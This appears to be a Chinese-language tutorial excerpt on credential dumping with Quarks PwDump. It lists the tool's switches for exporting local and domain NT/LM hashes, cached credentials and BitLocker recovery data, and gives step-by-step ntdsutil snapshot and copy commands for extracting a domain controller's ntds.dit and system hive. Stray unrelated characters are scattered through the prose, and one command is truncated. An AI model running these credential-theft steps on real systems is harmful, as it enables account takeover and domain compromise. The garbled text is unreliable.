Quarks PwDump是quarkslab出品的一款用戶密碼提取開(kāi)源工具霸旗，目前軟件最新版本為0.2b业踏，其完整源代碼可以從https://github.com/quarkslab/quarkspwdump獲取鞍陨，目前它支持Windows XP/2003/Vista/7/2008版本侠仇，且相當(dāng)穩(wěn)定脐湾。可以抓取windows平臺(tái)下多種類型的用戶憑據(jù)捧韵，包括：本地帳戶市咆、域帳戶、緩存的域帳戶和Bitlocker再来。作者開(kāi)發(fā)這個(gè)工具的原因是現(xiàn)在沒(méi)有一款工具能同時(shí)抓取所有類型的hash和Bitlocker信息蒙兰。

工具源代碼下載地址：https://codeload.github.com/quarkslab/quarkspwdump/zip/master。

它目前可以導(dǎo)出:

– Local accounts NT/LM hashes +

history 本機(jī)NT/LM哈希+歷史登錄記錄

– Domain accounts NT/LM hashes +

history 域中的NT/LM哈希+歷史登錄記錄

– Cached domain password 緩存中的域管理密碼

– Bitlocker recovery information

(recovery passwords & key packages) 使用Bitlocker的恢復(fù)后遺留的信息芒篷。

1.3.1使用Quarks PwDump本地帳號(hào)的哈希值

Quarks PwDump必須在Dos命令提示符下運(yùn)行搜变，直接運(yùn)行QuarksPwDumpv0.2b.exe，如圖1-7所示针炉，默認(rèn)顯示幫助信息挠他，其參數(shù)含義如下：

-dhl? 導(dǎo)出本地哈希值

-dhdc導(dǎo)出內(nèi)存中的域控哈希值

-dhd? 導(dǎo)出域控哈希值，必須指定NTDS文件

-db? 導(dǎo)出Bitlocker信息篡帕，必須指定NTDS文件

-nt?? 導(dǎo)出ntds文件

-hist?導(dǎo)出歷史信息殖侵，可選項(xiàng)

-t?? 導(dǎo)出類型可選默認(rèn)導(dǎo)出為John類型。

-o?? 導(dǎo)出文件到本地

圖1-7使用Quarks PwDump本地帳號(hào)的哈希值

1.3.2使用Quarks PwDump導(dǎo)出賬號(hào)實(shí)例

使用命令“QuarksPwDumpv0.2b.exe -dhl -o

1.txt”將導(dǎo)出本地哈希值到當(dāng)前目錄的1.txt赂苗，執(zhí)行命令會(huì)顯示導(dǎo)出帳號(hào)的數(shù)量愉耙，如圖1-8所示。顯示有3個(gè)帳號(hào)導(dǎo)出到1.txt拌滋，打開(kāi)1.txt可以看到導(dǎo)出哈希值的具體帳號(hào)和值。

圖1-8導(dǎo)出本地帳號(hào)到文件

1.3.3配合ntdsutil工具導(dǎo)出域控密碼

Ntdsutil.exe是一個(gè)為 Active Directory 提供管理設(shè)施的命令行工具猜谚“苌埃可使用Ntdsutil.exe 執(zhí)行Active Directory的數(shù)據(jù)庫(kù)維護(hù)，管理和控制單個(gè)主機(jī)操作魏铅，創(chuàng)建應(yīng)用程序目錄分區(qū)昌犹，以及刪除由未使用Active Directory安裝向?qū)?(DCPromo.exe)成功降級(jí)的域控制器留下的元數(shù)據(jù)。Ntdsutil還可以用來(lái)獲取域控?cái)?shù)據(jù)庫(kù)ntds.dit文件览芳，具體命令如下：

（1）創(chuàng)建快照

ntdsutil? snapshot? "activate? instance?ntds"? create? quit?quit

（2）Ntdsutil掛載活動(dòng)目錄的快照

ntdsutil? snapshot? "mount {GUID}"? quit?quit

{GUID}為動(dòng)態(tài)獲取的斜姥，如圖1-9所示。

（3）復(fù)制快照的本地磁盤

copy?MOUNT_POINT\windows\NTDS\ntds.dit?c:\ntds.dit

（4）卸載快照

ntdsutil? snapshot? "unmount {GUID}"? quit?quit

（5）刪除快照

ntdsutil? snapshot? "delete {GUID}"? quit?quit

圖1-9導(dǎo)出快照文件

使用命令“QuarksPwDump.exe --dump-hash-domain

--ntds-file c:\ntds.dit”將導(dǎo)出的ntds.dit文件中哈希值全面導(dǎo)出。一個(gè)完整的實(shí)例如下：

tdsutil? snapshot?"activate? instance? ntds"?create? quit? quit

ntdsutil? snapshot?"mount {a0455f6c-40c3-4b56-80a0-80261471522c}"? quit?quit

快照{(diào)5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接為C:\$SNAP_201212082315_VOLUM

EC$\

copy?C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit? c:\ntds.dit

ntdsutil? snapshot?"unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}"? quit?quit

ntdsutil? snapshot?"delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}"? quit?quit

QuarksPwDump.exe

--dump-hash-domain --ntds-file c:\ntds.dit

說(shuō)明：獲取哈希值最好都在同一臺(tái)服務(wù)器上執(zhí)行铸敏，也即將QuarksPwDump.exe直接放在導(dǎo)出ntds.dit服務(wù)器上缚忧，執(zhí)行導(dǎo)出命令。如果僅僅將ntds.dit復(fù)制后下載本地可能會(huì)出現(xiàn)無(wú)法讀取錯(cuò)誤杈笔。網(wǎng)上也曾經(jīng)出現(xiàn)一個(gè)NTDS.dit密碼快速提取工具ntdsdump闪水，讀者可以自己進(jìn)行測(cè)試。如果是想下載ntds.dit到本地恢復(fù)還需要執(zhí)行“reg save hklm\system system.hive”蒙具，將system.hive和ntds.dit全部復(fù)制到本地進(jìn)行域控密碼獲取球榆。

參考資料

1. Quarks PwDump，http://blog.quarkslab.com/quarks-pwdump.html

2. NTDS.dit密碼快速提取工具禁筏，http://www.secpulse.com/archives/6301.html